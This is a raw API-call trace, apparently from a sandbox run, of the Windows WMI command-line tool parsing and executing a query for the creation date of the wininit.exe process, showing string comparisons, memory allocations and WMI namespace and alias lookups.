[0401.263] _wcsicmp (_String1="PROCESS", _String2="\"NULL\"") returned 78
[0401.263] malloc (_Size=0x10) returned 0x2095e0
[0401.263] malloc (_Size=0x8) returned 0x20cce0
[0401.263] free (_Block=0x0)
[0401.263] free (_Block=0x2095c0)
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] malloc (_Size=0xc) returned 0x2095c0
[0401.263] lstrlenW (lpString="where") returned 5
[0401.264] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85
[0401.264] malloc (_Size=0xc) returned 0x209600
[0401.264] malloc (_Size=0x10) returned 0x209620
[0401.264] memmove_s (in: _Destination=0x209620, _DestinationSize=0x8, _Source=0x20cce0, _SourceSize=0x8 | out: _Destination=0x209620) returned 0x0
[0401.264] free (_Block=0x20cce0)
[0401.264] free (_Block=0x0)
[0401.264] free (_Block=0x2095c0)
[0401.264] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.264] lstrlenW (lpString="WHERE") returned 5
[0401.264] lstrlenW (lpString="where") returned 5
[0401.264] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0401.264] malloc (_Size=0x26) returned 0x20cce0
[0401.264] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.264] _wcsicmp (_String1="name=\"wininit.exe\"", _String2="\"NULL\"") returned 76
[0401.264] malloc (_Size=0x26) returned 0x20cd10
[0401.264] malloc (_Size=0x18) returned 0x2095c0
[0401.265] memmove_s (in: _Destination=0x2095c0, _DestinationSize=0x10, _Source=0x209620, _SourceSize=0x10 | out: _Destination=0x2095c0) returned 0x0
[0401.265] free (_Block=0x209620)
[0401.265] free (_Block=0x0)
[0401.265] free (_Block=0x20cce0)
[0401.265] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.265] malloc (_Size=0x8) returned 0x20cce0
[0401.265] lstrlenW (lpString="get") returned 3
[0401.265] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0401.265] malloc (_Size=0x8) returned 0x20cd40
[0401.265] malloc (_Size=0x20) returned 0x20cd60
[0401.265] memmove_s (in: _Destination=0x20cd60, _DestinationSize=0x18, _Source=0x2095c0, _SourceSize=0x18 | out: _Destination=0x20cd60) returned 0x0
[0401.265] free (_Block=0x2095c0)
[0401.265] free (_Block=0x0)
[0401.265] free (_Block=0x20cce0)
[0401.265] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.265] malloc (_Size=0x1a) returned 0x20cce0
[0401.266] lstrlenW (lpString="creationdate") returned 12
[0401.266] _wcsicmp (_String1="creationdate", _String2="\"NULL\"") returned 65
[0401.266] malloc (_Size=0x1a) returned 0x20cd90
[0401.266] malloc (_Size=0x30) returned 0x208600
[0401.266] memmove_s (in: _Destination=0x208600, _DestinationSize=0x20, _Source=0x20cd60, _SourceSize=0x20 | out: _Destination=0x208600) returned 0x0
[0401.266] free (_Block=0x20cd60)
[0401.266] free (_Block=0x0)
[0401.266] free (_Block=0x20cce0)
[0401.266] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.266] malloc (_Size=0x28) returned 0x20cce0
[0401.266] lstrlenW (lpString="QUIT") returned 4
[0401.266] lstrlenW (lpString="PROCESS") returned 7
[0401.266] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1
[0401.267] lstrlenW (lpString="EXIT") returned 4
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3
[0401.267] free (_Block=0x20cce0)
[0401.267] WbemLocator:IUnknown:AddRef (This=0x26cc20) returned 0x2
[0401.267] malloc (_Size=0x28) returned 0x20cce0
[0401.267] lstrlenW (lpString="/") returned 1
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="/", cchCount2=1) returned 3
[0401.267] lstrlenW (lpString="-") returned 1
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="-", cchCount2=1) returned 3
[0401.268] lstrlenW (lpString="CLASS") returned 5
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3
[0401.268] lstrlenW (lpString="PATH") returned 4
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3
[0401.268] lstrlenW (lpString="CONTEXT") returned 7
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] malloc (_Size=0x10) returned 0x2095c0
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.269] GetCurrentThreadId () returned 0xdf0
[0401.269] ??0CHString@@QEAA@XZ () returned 0x16f560
[0401.269] malloc (_Size=0x18) returned 0x209620
[0401.269] malloc (_Size=0x18) returned 0x209640
[0401.269] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa2998 | out: ppNamespace=0xffaa2998*=0x2d6560) returned 0x0
[0401.383] free (_Block=0x209640)
[0401.383] free (_Block=0x209620)
[0401.383] CoSetProxyBlanket (pProxy=0x2d6560, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0401.384] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.384] GetCurrentThreadId () returned 0xdf0
[0401.384] ??0CHString@@QEAA@XZ () returned 0x16f3f8
[0401.384] malloc (_Size=0x18) returned 0x209620
[0401.384] malloc (_Size=0x18) returned 0x209640
[0401.385] malloc (_Size=0x18) returned 0x209660
[0401.385] malloc (_Size=0x18) returned 0x209680
[0401.385] SysStringLen (param_1="root\\cli") returned 0x8
[0401.385] SysStringLen (param_1="\\") returned 0x1
[0401.385] memcpy (in: _Dst=0x2e4d18, _Src=0x2e4cb8, _Size=0x12 | out: _Dst=0x2e4d18) returned 0x2e4d18
[0401.385] memcpy (in: _Dst=0x2e4d28, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2e4d28) returned 0x2e4d28
[0401.385] malloc (_Size=0x18) returned 0x2096a0
[0401.385] SysStringLen (param_1="root\\cli\\") returned 0x9
[0401.385] SysStringLen (param_1="ms_409") returned 0x6
[0401.386] memcpy (in: _Dst=0x256718, _Src=0x2e4d18, _Size=0x14 | out: _Dst=0x256718) returned 0x256718
[0401.386] memcpy (in: _Dst=0x25672a, _Src=0x2e4c88, _Size=0xe | out: _Dst=0x25672a) returned 0x25672a
[0401.386] free (_Block=0x209680)
[0401.386] free (_Block=0x209660)
[0401.386] free (_Block=0x209640)
[0401.386] free (_Block=0x209620)
[0401.386] malloc (_Size=0x18) returned 0x209620
[0401.386] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa29a0 | out: ppNamespace=0xffaa29a0*=0x2d6680) returned 0x0
[0401.408] free (_Block=0x209620)
[0401.408] free (_Block=0x2096a0)
[0401.408] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.408] GetCurrentThreadId () returned 0xdf0
[0401.408] ??0CHString@@QEAA@XZ () returned 0x16f570
[0401.408] malloc (_Size=0x18) returned 0x2096a0
[0401.408] malloc (_Size=0x18) returned 0x209620
[0401.409] malloc (_Size=0x18) returned 0x209640
[0401.409] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0401.409] malloc (_Size=0x3a) returned 0x20cdc0
[0401.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x20cdc0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0401.409] free (_Block=0x20cdc0)
[0401.409] malloc (_Size=0x18) returned 0x209660
[0401.409] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0401.409] SysStringLen (param_1="PROCESS") returned 0x7
[0401.409] memcpy (in: _Dst=0x2a6ed8, _Src=0x2742a8, _Size=0x3a | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.409] memcpy (in: _Dst=0x2a6f10, _Src=0x2e4cb8, _Size=0x10 | out: _Dst=0x2a6f10) returned 0x2a6f10
[0401.409] malloc (_Size=0x18) returned 0x209680
[0401.409] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0401.409] SysStringLen (param_1="'") returned 0x1
[0401.410] memcpy (in: _Dst=0x2a6e68, _Src=0x2a6ed8, _Size=0x48 | out: _Dst=0x2a6e68) returned 0x2a6e68
[0401.410] memcpy (in: _Dst=0x2a6eae, _Src=0x2e4d18, _Size=0x4 | out: _Dst=0x2a6eae) returned 0x2a6eae
[0401.410] free (_Block=0x209660)
[0401.410] free (_Block=0x209640)
[0401.410] free (_Block=0x209620)
[0401.410] free (_Block=0x2096a0)
[0401.410] IWbemServices:GetObject (in: This=0x2d6560, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0x16f578*=0x0, ppCallResult=0x0 | out: ppObject=0x16f578*=0x2c8c70, ppCallResult=0x0) returned 0x0
[0401.512] malloc (_Size=0x18) returned 0x2096a0
[0401.512] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Target", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Process", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.512] free (_Block=0x2096a0)
[0401.512] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.512] malloc (_Size=0x38) returned 0x208640
[0401.512] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.513] malloc (_Size=0x18) returned 0x2096a0
[0401.513] IWbemClassObject:Get (in: This=0x2c8c70, wszName="PWhere", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bc478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE ProcessId='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.513] free (_Block=0x2096a0)
[0401.513] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0401.513] malloc (_Size=0x28) returned 0x20cd60
[0401.513] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0401.513] malloc (_Size=0x18) returned 0x2096a0
[0401.514] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Connection", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bc478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0xd, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c9150, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.514] free (_Block=0x2096a0)
[0401.514] IUnknown:QueryInterface (in: This=0x2c9150, riid=0xffa37360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f490 | out: ppvObject=0x16f490*=0x2c9150) returned 0x0
[0401.514] GetCurrentThreadId () returned 0xdf0
[0401.514] ??0CHString@@QEAA@XZ () returned 0x16f3b8
[0401.514] malloc (_Size=0x18) returned 0x2096a0
[0401.514] IWbemClassObject:Get (in: This=0x2c9150, wszName="Namespace", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffa4738f, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.514] free (_Block=0x2096a0)
[0401.514] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0401.514] malloc (_Size=0x16) returned 0x2096a0
[0401.515] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0401.515] malloc (_Size=0x18) returned 0x209620
[0401.515] IWbemClassObject:Get (in: This=0x2c9150, wszName="Locale", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.515] free (_Block=0x209620)
[0401.515] lstrlenW (lpString="ms_409") returned 6
[0401.515] malloc (_Size=0xe) returned 0x209620
[0401.515] lstrlenW (lpString="ms_409") returned 6
[0401.515] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="User", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="Password", lFlags=0, pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="Server", lFlags=0, pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] lstrlenW (lpString=".") returned 1
[0401.516] malloc (_Size=0x4) returned 0x20cdc0
[0401.517] lstrlenW (lpString=".") returned 1
[0401.517] malloc (_Size=0x18) returned 0x209640
[0401.517] IWbemClassObject:Get (in: This=0x2c9150, wszName="Authority", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.517] free (_Block=0x209640)
[0401.517] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.517] IUnknown:Release (This=0x2c9150) returned 0x1
[0401.517] GetCurrentThreadId () returned 0xdf0
[0401.518] ??0CHString@@QEAA@XZ () returned 0x16f3b8
[0401.518] malloc (_Size=0x18) returned 0x209640
[0401.518] IWbemClassObject:Get (in: This=0x2c8c70, wszName="__RELPATH", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0
[0401.518] free (_Block=0x209640)
[0401.518] malloc (_Size=0x18) returned 0x209640
[0401.518] GetCurrentThreadId () returned 0xdf0
[0401.518] ??0CHString@@QEAA@XZ () returned 0x16f238
[0401.519] ??0CHString@@QEAA@PEBG@Z () returned 0x16f250
[0401.519] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f1e0
[0401.519] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0401.519] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x20cde0
[0401.519] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
[0401.519] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f1a0
[0401.519] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f1e8
[0401.519] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f250
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f1a8
[0401.520] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f1e0
[0401.520] ??1CHString@@QEAA@XZ () returned 0x1
[0401.520] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x20ce40
[0401.520] ?Find@CHString@@QEBAHPEBG@Z () returned 0x7
[0401.520] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f1a0
[0401.520] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f1e8
[0401.520] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f250
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f1a8
[0401.520] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f1e0
[0401.520] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.520] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4e0c960
[0401.521] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.521] malloc (_Size=0x18) returned 0x209660
[0401.521] malloc (_Size=0x18) returned 0x2096c0
[0401.521] malloc (_Size=0x18) returned 0x2096e0
[0401.521] malloc (_Size=0x18) returned 0x209700
[0401.521] malloc (_Size=0x18) returned 0x209720
[0401.521] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0401.521] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0401.521] memcpy (in: _Dst=0x2df748, _Src=0x2e05b8, _Size=0x7a | out: _Dst=0x2df748) returned 0x2df748
[0401.521] memcpy (in: _Dst=0x2df7c0, _Src=0x256718, _Size=0x30 | out: _Dst=0x2df7c0) returned 0x2df7c0
[0401.521] malloc (_Size=0x18) returned 0x209740
[0401.522] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0401.522] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26
[0401.522] memcpy (in: _Dst=0x2c8f28, _Src=0x2df748, _Size=0xa8 | out: _Dst=0x2c8f28) returned 0x2c8f28
[0401.522] memcpy (in: _Dst=0x2c8fce, _Src=0x2d9008, _Size=0x4e | out: _Dst=0x2c8fce) returned 0x2c8fce
[0401.522] malloc (_Size=0x18) returned 0x209760
[0401.522] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79
[0401.522] SysStringLen (param_1="\"") returned 0x1
[0401.522] memcpy (in: _Dst=0x2c9038, _Src=0x2c8f28, _Size=0xf4 | out: _Dst=0x2c9038) returned 0x2c9038
[0401.522] memcpy (in: _Dst=0x2c912a, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2c912a) returned 0x2c912a
[0401.522] free (_Block=0x209740)
[0401.522] free (_Block=0x209720)
[0401.522] free (_Block=0x209700)
[0401.523] free (_Block=0x2096e0)
[0401.523] free (_Block=0x2096c0)
[0401.523] free (_Block=0x209660)
[0401.523] IWbemServices:GetObject (in: This=0x2d6680, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f228*=0x0, ppCallResult=0x0 | out: ppObject=0x16f228*=0x2c93f0, ppCallResult=0x0) returned 0x0
[0401.529] malloc (_Size=0x18) returned 0x209660
[0401.529] IWbemClassObject:Get (in: This=0x2c93f0, wszName="Text", lFlags=0, pVal=0x16f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f260*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e9480*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x26e1c0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0
[0401.530] free (_Block=0x209660)
[0401.530] SafeArrayGetLBound (in: psa=0x2e9480, nDim=0x1, plLbound=0x16f240 | out: plLbound=0x16f240) returned 0x0
[0401.530] SafeArrayGetUBound (in: psa=0x2e9480, nDim=0x1, plUbound=0x16f230 | out: plUbound=0x16f230) returned 0x0
[0401.530] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f224, pv=0x16f278 | out: pv=0x16f278) returned 0x0
[0401.530] malloc (_Size=0x18) returned 0x209660
[0401.530] malloc (_Size=0x18) returned 0x2096c0
[0401.530] SysStringLen (param_1="Process management. ") returned 0x14
[0401.530] memcpy (in: _Dst=0x2c6278, _Src=0x2c6228, _Size=0x2a | out: _Dst=0x2c6278) returned 0x2c6278
[0401.531] free (_Block=0x209660)
[0401.531] IUnknown:Release (This=0x2c93f0) returned 0x0
[0401.531] free (_Block=0x209760)
[0401.531] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.531] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.531] free (_Block=0x209640)
[0401.531] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.531] lstrlenW (lpString="Process management. ") returned 20
[0401.531] malloc (_Size=0x2a) returned 0x208680
[0401.531] lstrlenW (lpString="Process management. ") returned 20
[0401.532] free (_Block=0x2096c0)
[0401.532] IUnknown:Release (This=0x2c8c70) returned 0x0
[0401.532] free (_Block=0x209680)
[0401.532] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.532] lstrlenW (lpString="PATH") returned 4
[0401.532] lstrlenW (lpString="where") returned 5
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3
[0401.532] lstrlenW (lpString="WHERE") returned 5
[0401.532] lstrlenW (lpString="where") returned 5
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0401.532] lstrlenW (lpString="/") returned 1
[0401.532] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="/", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="-") returned 1
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="-", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] malloc (_Size=0x26) returned 0x20cde0
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] lstrlenW (lpString="/") returned 1
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="-") returned 1
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] malloc (_Size=0x8) returned 0x20ce10
[0401.533] lstrlenW (lpString="get") returned 3
[0401.534] lstrlenW (lpString="GET") returned 3
[0401.534] lstrlenW (lpString="get") returned 3
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.534] lstrlenW (lpString="/") returned 1
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="/", cchCount2=1) returned 3
[0401.534] lstrlenW (lpString="-") returned 1
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="-", cchCount2=1) returned 3
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] malloc (_Size=0x1a) returned 0x20ce30
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.535] malloc (_Size=0x8) returned 0x20ce60
[0401.535] GetCurrentThreadId () returned 0xdf0
[0401.535] ??0CHString@@QEAA@XZ () returned 0x16f118
[0401.535] malloc (_Size=0x8) returned 0x20ce80
[0401.535] memmove_s (in: _Destination=0x20ce80, _DestinationSize=0x8, _Source=0x20ce60, _SourceSize=0x8 | out: _Destination=0x20ce80) returned 0x0
[0401.535] malloc (_Size=0x18) returned 0x209680
[0401.535] malloc (_Size=0x18) returned 0x2096c0
[0401.536] malloc (_Size=0x18) returned 0x209640
[0401.536] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0401.536] malloc (_Size=0x3a) returned 0x20cea0
[0401.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x20cea0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0401.536] free (_Block=0x20cea0)
[0401.536] malloc (_Size=0x18) returned 0x209760
[0401.536] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0401.536] SysStringLen (param_1="PROCESS") returned 0x7
[0401.536] memcpy (in: _Dst=0x2a6ed8, _Src=0x2c8f28, _Size=0x3a | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.536] memcpy (in: _Dst=0x2a6f10, _Src=0x2e4cb8, _Size=0x10 | out: _Dst=0x2a6f10) returned 0x2a6f10
[0401.536] malloc (_Size=0x18) returned 0x209660
[0401.536] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0401.536] SysStringLen (param_1="'") returned 0x1
[0401.536] memcpy (in: _Dst=0x2df748, _Src=0x2a6ed8, _Size=0x48 | out: _Dst=0x2df748) returned 0x2df748
[0401.537] memcpy (in: _Dst=0x2df78e, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2df78e) returned 0x2df78e
[0401.537] free (_Block=0x209760)
[0401.537] free (_Block=0x209640)
[0401.537] free (_Block=0x2096c0)
[0401.537] free (_Block=0x209680)
[0401.537] IWbemServices:GetObject (in: This=0x2d6560, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0x16f158*=0x0, ppCallResult=0x0 | out: ppObject=0x16f158*=0x2c8c70, ppCallResult=0x0) returned 0x0
